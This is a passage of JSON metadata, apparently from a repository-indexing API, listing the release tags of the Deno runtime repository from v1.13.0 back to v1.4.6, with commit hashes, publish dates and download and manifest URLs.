:"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repo